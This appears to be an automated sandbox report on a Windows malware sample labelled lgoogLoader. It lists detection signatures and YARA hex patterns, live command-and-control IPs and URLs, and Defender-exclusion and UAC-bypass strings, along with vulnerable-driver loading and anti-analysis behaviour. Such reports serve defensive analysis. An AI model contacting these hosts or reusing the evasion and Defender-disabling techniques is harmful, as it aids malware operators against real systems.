Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:882700
MD5:daf761fb9aaa34a9c2120003694d88a3
SHA1:47fd2695b6da26f6444799d442662b982d70f783
SHA256:18d4850a10812f3b4d8631939d469b41c1d344a7fa9205acc31b265d0600291b
Tags:NETexeLgoogLoaderMSILx64
Infos:

Detection

lgoogLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected lgoogLoader
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sample is not signed and drops a device driver
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Contains functionality to load drivers
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Contains functionality to launch a program with higher privileges
Spawns drivers
Found evaded block containing many API calls
Creates or modifies windows services
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 6988 cmdline: C:\Users\user\Desktop\file.exe MD5: DAF761FB9AAA34A9C2120003694D88A3)
    • ComSvcConfig.exe (PID: 4572 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe MD5: 2778AE0EB674B74FF8028BF4E51F1DF5)
    • jsc.exe (PID: 3068 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
LgoogLoaderLgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\?????.sysPUA_VULN_Driver_Sysinternalswwwsysinternalscom_procexpsys_ProcessExplorer_HoEPDetects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 97e3a44ec4ae58c8cc38eefc613e950e.binFlorian Roth
  • 0x6765:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 ...
  • 0x66fd:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 79 00 73 00 69 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 73 00 20 00 2D 00 20 00 77 00 77 00 77 00 2E ...
  • 0x67b1:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 36 00 2E 00 34 00 33
  • 0x6911:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 36 00 2E 00 34 00 33
  • 0x67dd:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 70 00 72 00 6F 00 63 00 65 00 78 00 70 00 2E 00 73 00 79 00 73
  • 0x68cd:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 00 72
  • 0x688d:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 70 00 72 00 6F 00 63 00 65 00 78 00 70 00 2E 00 53 00 79 00 73
  • 0x6815:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 4D 00 61 00 72 ...
SourceRuleDescriptionAuthorStrings
00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth (Nextron Systems)
  • 0xade:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
  • 0x6546:$xo1: \x9E\xA2\xA3\xB9\xEA\xBA\xB8\xA5\xAD\xB8\xAB\xA7\xEA\xA9\xAB\xA4\xA4\xA5\xBE\xEA\xA8\xAF\xEA\xB8\xBF\xA4\xEA\xA3\xA4\xEA\x8E\x85\x99\xEA\xA7\xA5\xAE\xAF
00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_lGoogLoaderYara detected lgoogLoaderJoe Security
    00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      Process Memory Space: file.exe PID: 6988JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: file.exe PID: 6988JoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          SourceRuleDescriptionAuthorStrings
          0.2.file.exe.1f6c773a2a8.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0.2.file.exe.1f6c773a2a8.2.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
            • 0x9d0d:$e1: Microsoft\Windows Defender\Exclusions\Paths
            • 0x9d3c:$e2: Add-MpPreference -ExclusionPath
            0.2.file.exe.1f6c773a2a8.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOMDetects executables embedding command execution via IExecuteCommand COM objectditekSHen
            • 0x9cdd:$r1: Classes\Folder\shell\open\command
            • 0x912c:$k1: DelegateExecute
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeReversingLabs: Detection: 45%
            Source: file.exeVirustotal: Detection: 56%Perma Link
            Source: http://5.42.94.169/customer/368Avira URL Cloud: Label: malware
            Source: http://109.206.241.33/files/Hadi.config.CfgEncFileMZAvira URL Cloud: Label: malware
            Source: http://5.42.94.169Virustotal: Detection: 7%Perma Link
            Source: http://5.42.94.169/customer/368Virustotal: Detection: 8%Perma Link
            Source: file.exeJoe Sandbox ML: detected

            Exploits

            barindex
            Source: Yara matchFile source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\Purala\source\repos\Particle-Filter\obj\x86\Debug\FastSLAM.pdb source: file.exe
            Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.dr
            Source: global trafficHTTP traffic detected: GET /customer/368 HTTP/1.1Host: 5.42.94.169Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 5.42.94.169 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.94.169
            Source: jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.493023944.0000000000E66000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.33/files/Hadi.config.CfgEncFileMZ
            Source: file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.94.169
            Source: file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.94.169/customer/368
            Source: file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: jsc.exeString found in binary or memory: http://www.sysinternals.com
            Source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.drString found in binary or memory: https://www.sysinternals.com0
            Source: global trafficHTTP traffic detected: GET /customer/368 HTTP/1.1Host: 5.42.94.169Connection: Keep-Alive

            System Summary

            barindex
            Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
            Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
            Source: 0.2.file.exe.1f6c773a2a8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth (Nextron Systems), description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
            Source: C:\Users\user\AppData\Local\Temp\?????.sys, type: DROPPEDMatched rule: PUA_VULN_Driver_Sysinternalswwwsysinternalscom_procexpsys_ProcessExplorer_HoEP date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 97e3a44ec4ae58c8cc38eefc613e950e.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = 440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CFAA5770_2_00007FFC9CFAA577
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CF90E580_2_00007FFC9CF90E58
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CFA12080_2_00007FFC9CFA1208
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CF96A170_2_00007FFC9CF96A17
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CFA3AF50_2_00007FFC9CFA3AF5
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00404AF02_2_00404AF0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_004084B72_2_004084B7
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,2_2_00402050
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CFA5870 NtLoadDriver,0_2_00007FFC9CFA5870
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CFA5870 NtLoadDriver,0_2_00007FFC9CFA5870
            Source: file.exeStatic PE information: No import functions for PE file found
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprocexp.SysB vs file.exe
            Source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShellRunasP vs file.exe
            Source: file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShellRunasP vs file.exe
            Source: file.exe, 00000000.00000002.495389743.000001F6D7771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs file.exe
            Source: file.exe, 00000000.00000002.493612039.000001F6C5C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRunpeX.Stub.Framework.exeL vs file.exe
            Source: file.exe, 00000000.00000002.493115383.000001F6C58BA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeroxipe4 vs file.exe
            Source: file.exe, 00000000.00000002.493218018.000001F6C5AF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
            Source: file.exeBinary or memory string: OriginalFilenameeroxipe4 vs file.exe
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Load DriverJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
            Source: C:\Users\user\Desktop\file.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKillJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
            Source: file.exeReversingLabs: Detection: 45%
            Source: file.exeVirustotal: Detection: 56%
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CFA58C4 AdjustTokenPrivileges,0_2_00007FFC9CFA58C4
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
            Source: ?????.sys.0.drBinary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@5/2@0/1
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_004029C0 _memset,_memset,SHGetMalloc,SHGetDesktopFolder,SearchPathW,GetLastError,CoInitialize,CoCreateInstance,#217,#173,CoUninitialize,2_2_004029C0
            Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: file.exe, ????????/?????????.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Purala\source\repos\Particle-Filter\obj\x86\Debug\FastSLAM.pdb source: file.exe
            Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001F6C58B8762 push rsp; retn 0009h0_2_000001F6C58B8766
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFC9CF967E9 push ebx; retf 0_2_00007FFC9CF967EA
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00404ACD push ecx; ret 2_2_00404AE0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,2_2_00402CB0

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to dropped file
            Source: C:\Users\user\Desktop\file.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKillJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
